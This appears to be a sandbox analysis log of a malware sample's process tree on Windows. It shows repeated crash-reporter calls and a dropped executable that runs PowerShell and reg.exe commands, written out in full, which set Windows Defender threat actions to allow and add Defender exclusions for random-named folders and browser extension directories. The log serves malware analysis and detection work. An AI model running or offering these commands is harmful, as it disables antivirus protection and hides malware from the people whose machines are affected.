C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 19644⤵
- Program crash
PID:2184 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 22284⤵
- Program crash
PID:2168 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 11684⤵
- Program crash
PID:3336 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 16924⤵
- Program crash
PID:4216 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 17644⤵
- Program crash
PID:864 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 10764⤵PID:3696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 13884⤵PID:404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 11604⤵PID:2128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:3796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:2604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 58281⤵PID:3056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:2840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 58281⤵PID:6140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 58281⤵PID:2168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5828 -ip 58281⤵PID:4900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 58281⤵PID:1192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:3420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5828 -ip 58281⤵PID:2652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5828 -ip 58281⤵PID:864
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5828 -ip 58281⤵PID:5688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5828 -ip 58281⤵PID:652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:2088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5828 -ip 58281⤵PID:2084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5828 -ip 58281⤵PID:5356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 58281⤵PID:1716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5828 -ip 58281⤵PID:5704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 58281⤵PID:940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5828 -ip 58281⤵PID:3972
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5828 -ip 58281⤵PID:4272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 58281⤵PID:5392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5828 -ip 58281⤵PID:6020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 58281⤵PID:6004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5828 -ip 58281⤵PID:2628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 58281⤵PID:6120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:5532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 58281⤵PID:3380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 58281⤵PID:3124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5828 -ip 58281⤵PID:1384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 58281⤵PID:1832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5828 -ip 58281⤵PID:5980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 58281⤵PID:860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 58281⤵PID:2168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 58281⤵PID:5312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5828 -ip 58281⤵PID:3868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5828 -ip 58281⤵PID:5432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 58281⤵PID:484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 58281⤵PID:3064
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5828 -ip 58281⤵PID:3540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 58281⤵PID:3704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 58281⤵PID:6080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5828 -ip 58281⤵PID:196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5828 -ip 58281⤵PID:1580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 58281⤵PID:4620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 58281⤵PID:4324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 58281⤵PID:5192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 58281⤵PID:1948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 58281⤵PID:3444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5828 -ip 58281⤵PID:1764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5828 -ip 58281⤵PID:1084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:5100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 58281⤵PID:5540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 58281⤵PID:2452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5828 -ip 58281⤵PID:5260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 58281⤵PID:4208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 58281⤵PID:5392
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1432
-
C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exeC:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe z0 /gWdidO 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1916 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4212 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:652
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5184
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5716
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:868
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2428
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5724
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5704
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5408
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:616
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:892
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5220
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:768
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5468
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1544
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:988
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2232
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:6108
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1148
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2088
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3696
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5392
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4056
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1588
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2944
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3760
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1604
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:396
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5412
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1740
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:323⤵PID:1452
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:324⤵PID:2360
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:643⤵PID:4736
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:323⤵PID:1888
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:643⤵PID:1048
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:323⤵PID:5768
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:643⤵PID:3436
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:323⤵PID:4776
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:643⤵PID:1692
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:323⤵PID:4076
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:643⤵PID:556
-
